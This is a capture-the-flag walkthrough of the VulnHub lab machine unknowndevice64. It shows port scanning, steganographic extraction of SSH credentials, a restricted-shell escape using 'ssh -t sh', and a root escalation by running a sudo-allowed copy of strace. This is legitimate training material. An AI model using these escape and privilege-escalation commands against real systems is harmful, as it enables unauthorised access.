Info
Name: unknowndevice64: 1
Operating System: Linux
Url: https://www.vulnhub.com/entry/unknowndevice64-1,293/
Release: 9 Mar 2019
Difficulty: Intermediate(??)
Description: unknowndevice64 v1.0 is a medium level boot2root challenge. Follow your intuitions ... and enumerate!
Enumeration
As always, let's start with NMAP.
nmap -sC -sV -p- 192.168.1.116
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-13 21:17 CET
Nmap scan report for 192.168.1.116
Host is up (0.000066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:af:04:6d:f1:8c:59:3a:d6:e1:96:b7:f7:fc:57:83 (RSA)
| 256 12:68:4c:6b:96:1e:51:59:32:8a:3d:41:0d:55:6b:d2 (ECDSA)
|_ 256 da:3e:28:52:30:72:7a:dd:c3:fb:89:7e:54:f4:bb:fb (ED25519)
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-title: Website By Unknowndevice64
MAC Address: 00:0C:29:12:74:FE (VMware)Let's start with the web server.
Visiting the web server gives us the following page:
Nothing really interesting being displayed here.
Looking at the source code however, reveals something interesting.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<body>
<title> Website By Unknowndevice64 </title>
<head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <link href="" rel="icon" type="image/png"/> <link type="text/css" rel="stylesheet" href="http://fonts.googleapis.com/css?family=Share+Tech+Mono"> <link type="text/css" rel="stylesheet" href="http://fonts.googleapis.com/css?family=Geo">
<meta content="Website By Unknowndevice64 | ud64 name="description"/>
<meta content="Website By Unknowndevice64 | ud64 name="keywords"/>
<meta content="Website By Unknowndevice64 | ud64 name="Abstract"/>
<meta name="Website By Unknowndevice64 | ud64"/>
</head>
<style type="text/css" media="all"> html,body{margin:0;padding:0;} #text-shadow-box{position:fixed;left:0;right:0;top:0;bottom:0;width:100%;height:100%;overflow:hidden;background:#ffffff;font-family:Stencil,Arial,sans-serif;-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-select:none;} #text-shadow-box #tsb-text,#text-shadow-box #tsb-link{position:absolute;top:49%;left:0;width:100%;height:1em;margin:-0.77em 0 0 0;font-size:70px;line-height:1em;font-weight:bold;text-align:center;} #text-shadow-box #tsb-text{font-size:100px;color:transparent;text-shadow:black 0px -45.2px 19px;} #text-shadow-box #tsb-link a{color:#FFF;text-decoration:none;} #text-shadow-box #tsb-box,#text-shadow-box #tsb-wall{position:absolute;top:50%;left:0;width:100%;height:60%;} #text-shadow-box #tsb-box{-webkit-box-shadow:black 0px -45.2px 39px;-moz-box-shadow:black 0px -45.2px 39px;} #text-shadow-box #tsb-wall{background:#ffffff;} #text-shadow-box #tsb-wall p{position:relative;font-size:15px;line-height:1.5em;text-align:justify;color:#222;width:550px;margin:1.5em auto;cursor:default;} #text-shadow-box #tsb-wall p a{color:#fff;} #text-shadow-box #tsb-wall p a:hover{text-decoration:none;color:#000;background:#fff;} #tsb-spot{position:absolute;top:-50%;left:-50%;width:200%;height:200%;pointer-events:none;background:-webkit-gradient(radial,center center,0,center center,450,from(rgba(0,0,0,0)),to(rgba(0,0,0,1)));background:-moz-radial-gradient(center 45deg,circle closest-side,transparent 0,black 450px);} #blue{color:#0062ff;} </style> <!-- [if IE]>
<style type="text/css"> /* Sadly no IE9 support for pointer-events: none; nor CSS2 text-shadow */ #tsb-spot { display: none; } #tsb-ie { position: absolute; top: -90%; left: -50%; width: 200%; height: 334%; background: url(data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8c3ZnIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgdmlld0JveD0iMCAwIDEgMSIgcHJlc2VydmVBc3BlY3RSYXRpbz0ibm9uZSI+CiAgPHJhZGlhbEdyYWRpZW50IGlkPSJncmFkLXVjZ2ctZ2VuZXJhdGVkIiBncmFkaWVudFVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY3g9IjUwJSIgY3k9IjUwJSIgcj0iNzUlIj4KICAgIDxzdG9wIG9mZnNldD0iMCUiIHN0b3AtY29sb3I9IiMwMDAwMDAiIHN0b3Atb3BhY2l0eT0iMCIvPgogICAgPHN0b3Agb2Zmc2V0PSI3NCUiIHN0b3AtY29sb3I9IiMwMDAwMDAiIHN0b3Atb3BhY2l0eT0iMSIvPgogICAgPHN0b3Agb2Zmc2V0PSIxMDAlIiBzdG9wLWNvbG9yPSIjMDAwMDAwIiBzdG9wLW9wYWNpdHk9IjEiLz4KICA8L3JhZGlhbEdyYWRpZW50PgogIDxyZWN0IHg9Ii01MCIgeT0iLTUwIiB3aWR0aD0iMTAxIiBoZWlnaHQ9IjEwMSIgZmlsbD0idXJsKCNncmFkLXVjZ2ctZ2VuZXJhdGVkKSIgLz4KPC9zdmc+); } </style>
<![endif] --> </center> <div id="text-shadow-box"> <div style="box-shadow: 0px 75.2px 57px black;" id="tsb-box"> </div></center> <p style="text-shadow: -112.8px 75.2px 37px black;" id="tsb-text">ud64</p> <p id="tsb-link">
<a href="#" target="_blank">ud64</a> </p> <div id="tsb-wall"> <div id="tsb-ie"> </div> <p> </p> <center> <img src="ud64.gif" width="200" height="200"> <h4>“Not a visible enthusiasm but a <span style="color:red">h1dd3n</span> one, an excitement burning with a cold flame.” </h4> <h2></h2> <h2>Thanks to: ./AjayVerma (AKA unknowndevice64)</h2> <h5>2018</h5> </center>
<div id="ttecleado" ?=""> <table> <tbody> <tr> <td colspan="2"> </td> <td colspan="2"> </td> </tr> <tr> </tr> </tbody> </table> </center> </div><br /> </div><span style="color: rgb(0, 98, 255); font-family: Tahoma; font-size: 18px;"><strong></strong></span> <div style="background-position: 282px -284px;" id="tsb-spot"> </div><span style="color: rgb(0, 98, 255); font-family: Tahoma; font-size: 18px;"><strong></strong></span> </div> <script type="text/javascript" language="javascript" charset="utf-8"> /** * * * just happy (^_^) * * Power . . . of Shadows . . . */ var text = null; var spot = null; var box = null; var boxProperty = ''; init(); function init() { text = document.getElementById('tsb-text'); spot = document.getElementById('tsb-spot'); box = document.getElementById('tsb-box'); if (typeof box.style.webkitBoxShadow == 'string') { boxProperty = 'webkitBoxShadow'; } else if (typeof box.style.MozBoxShadow == 'string') { boxProperty = 'MozBoxShadow'; } else if (typeof box.style.boxShadow == 'string') { boxProperty = 'boxShadow'; } if (text && spot && box) { document.getElementById('text-shadow-box').onmousemove = onMouseMove; document.getElementById('text-shadow-box').ontouchmove = function (e) {e.preventDefault(); e.stopPropagation(); onMouseMove({clientX: e.touches[0].clientX, clientY: e.touches[0].clientY});}; } } function onMouseMove(e) { if (typeof e === 'undefined' || typeof e.clientX === 'undefined') { return; } var xm = (e.clientX - Math.floor(window.innerWidth / 2)) * 0.4; var ym = (e.clientY - Math.floor(window.innerHeight / 3)) * 0.4; var d = Math.round(Math.sqrt(xm*xm + ym*ym) / 5); text.style.textShadow = -xm + 'px ' + -ym + 'px ' + (d + 10) + 'px black'; if (boxProperty) { box.style[boxProperty] = '0 ' + -ym + 'px ' + (d + 30) + 'px black'; } xm = e.clientX - Math.floor(window.innerWidth / 2); ym = e.clientY - Math.floor(window.innerHeight / 2); spot.style.backgroundPosition = xm + 'px ' + ym + 'px'; } </script> /* <p> </p> <center> <div align="center"> #outerCircleText { /* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */ font-style: Electrofied; font-weight: bold; font-family: 'Electrofied', Electrofied, Electrofied; color: white; /* End Optional */ /* Start Required - Do Not Edit */ position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;} #outerCircleText div {position: relative;} #outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;} /* End Required */ /* End Circle Text Styles */ </style> </center> </body></span><br />
<br />
<p class="para" align="left"><p>Website By Unknowndevice64</p>
<!-- key_is_h1dd3n.jpg -->
<p> </p>
<p> </p>
<p> </p>
<p> </p>
<p>./Ajay Verma </p></p>
</div>
</div>
</head>
</body>
</html>
Downloading key_is_h1dd3n.jpg gives us the following image:
Exiftool gives us nothing interesting:
exiftool key_is_h1dd3n.jpg
ExifTool Version Number : 11.16
File Name : key_is_h1dd3n.jpg
Directory : .
File Size : 5.3 kB
File Modification Date/Time : 2018:12:31 07:25:55+01:00
File Access Date/Time : 2019:03:13 20:35:00+01:00
File Inode Change Date/Time : 2019:03:13 20:34:56+01:00
File Permissions : rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 300
Image Height : 300
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 1
Image Size : 300x300
Megapixels : 0.090Same with binwalk:
binwalk key_is_h1dd3n.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01But running steghide against the image prompts us for a password!
steghide extract -sf key_is_h1dd3n.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!Guessing the password is really simple. Especially since the password is in the filename: h1dd3n.
steghide extract -sf key_is_h1dd3n.jpg
Enter passphrase:
wrote extracted data to "h1dd3n.txt".Printing the contents of h1dd3n.txt:
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.----------------
-.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++
.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.
This is the programming language Brainfuck.
We can use the online compiler copy.sh/brainfuck to actually run this program:
Awesome! That looks like a username/password combination.
Let's try and SSH into the box.
Initial Foothold
root@kali:~# ssh ud64@192.168.1.116 -p 1337
ud64@192.168.1.116's password:
Last login: Wed Mar 13 21:39:33 2019 from 192.168.1.115
ud64@unknowndevice64_v1:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$
Okay, so we're stuck in rbash. Great.
Before moving on to the privesc part, we need to break out of jail.
What if we use the -t parameter with the ssh command? To maybe, spawn us a shell before we are jailed by rbash?
From the man pages:
-t Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very use‐
ful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.
root@kali:~# ssh ud64@192.168.1.116 -p 1337 -t sh
ud64@192.168.1.116's password:
sh-4.4$ ls -la
total 64
drwxr-xr-x 12 ud64 ud64 4096 Dec 31 08:51 .
drwxr-xr-x 6 root root 4096 Dec 31 06:52 ..
-rw------- 1 ud64 ud64 1028 Mar 13 21:42 .bash_history
-rw------- 1 ud64 ud64 108 Dec 31 07:09 .bash_profile
drwx------ 2 ud64 ud64 4096 Dec 31 07:22 .config
-rw-r--r-- 1 ud64 ud64 3729 Oct 23 2017 .screenrc
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 07:22 Desktop
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 07:22 Documents
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 07:22 Downloads
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 07:22 Music
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 07:22 Pictures
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 07:22 Public
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 07:22 Videos
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 08:40 prog
drwxr-xr-x 2 ud64 ud64 4096 Dec 31 08:56 web
sh-4.4$ echo #FUCK YOU, rbash
Privilege Escalation
Always, I mean always go for the low hanging fruit first.
By that I mean, always check the simplest things before starting some deep enumeration process.
sh-4.4$ sudo -l
User ud64 may run the following commands on unknowndevice64_v1:
(ALL) NOPASSWD: /usr/bin/sysud64
Okay, so we can run a program called sysud64... Let's first run the program and see what we can do with it.
sh-4.4$ sudo /usr/bin/sysud64
/usr/bin/sysud64: must have PROG [ARGS] or -p PID
Try '/usr/bin/sysud64 -h' for more information.
Ehm, I have seen that output before.
Is sysud64 the same program as strace? If so we can easily get a root shell!
sh-4.4$ md5sum /usr/bin/sysud64
d8d774ed8ee9907338ca152454a3e435 /usr/bin/sysud64
sh-4.4$ md5sum /usr/bin/strace
d8d774ed8ee9907338ca152454a3e435 /usr/bin/strace
Well then, let's get a root shell, shall we?
By using the following command we can drop to a shell using the regular strace:
sudo strace -o /dev/null /bin/sh
And since strace == sysud64 we can now get a root shell:
sh-4.4$ sudo /usr/bin/sysud64 -o /dev/null /bin/sh
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-4.4#
sh-4.4# cat /root/flag.txt
___ _ _
/ _ \ | | | |
/ /_\ \ | |__ __ _ ___| | _____ _ __
| _ | | '_ \ / _` |/ __| |/ / _ \ '__|
| | | | | | | | (_| | (__| < __/ |
\_| |_/ |_| |_|\__,_|\___|_|\_\___|_|
_ __ _
| | / _| | |
__| | ___ ___ ___ | |_ ___ _ __ | | _____ _____
/ _` |/ _ \ / _ \/ __| | _/ _ \| '__| | |/ _ \ \ / / _ \
| (_| | (_) | __/\__ \ | || (_) | | | | (_) \ V / __/
\__,_|\___/ \___||___/ |_| \___/|_| |_|\___/ \_/ \___|
_ _ _ _
| | | | | | | |
__ _| |__ __ _| |_ ___ | |_| |__ ___ _ __ ___
\ \ /\ / / '_ \ / _` | __| / _ \| __| '_ \ / _ \ '__/ __|
\ V V /| | | | (_| | |_ | (_) | |_| | | | __/ | \__ \
\_/\_/ |_| |_|\__,_|\__| \___/ \__|_| |_|\___|_| |___/
_ _ _ _
| | | | | | | |
__ _____ _ _| | __| | _ __ ___ | |_ __| | ___
\ \ /\ / / _ \| | | | |/ _` | | '_ \ / _ \| __| / _` |/ _ \
\ V V / (_) | |_| | | (_| | | | | | (_) | |_ | (_| | (_) |
\_/\_/ \___/ \__,_|_|\__,_| |_| |_|\___/ \__| \__,_|\___/
__
/ _|
| |_ ___ _ __ _ __ ___ ___ _ __ ___ _ _
| _/ _ \| '__| | '_ ` _ \ / _ \| '_ \ / _ \ | | |
| || (_) | | | | | | | | (_) | | | | __/ |_| |_
|_| \___/|_| |_| |_| |_|\___/|_| |_|\___|\__, (_)
__/ |
|___/
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( . | / | u | n | k | n | o | w | n | d | e | v | i | c | e | 6 | 4 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
Further Reading
https://en.wikipedia.org/wiki/Brainfuck
https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/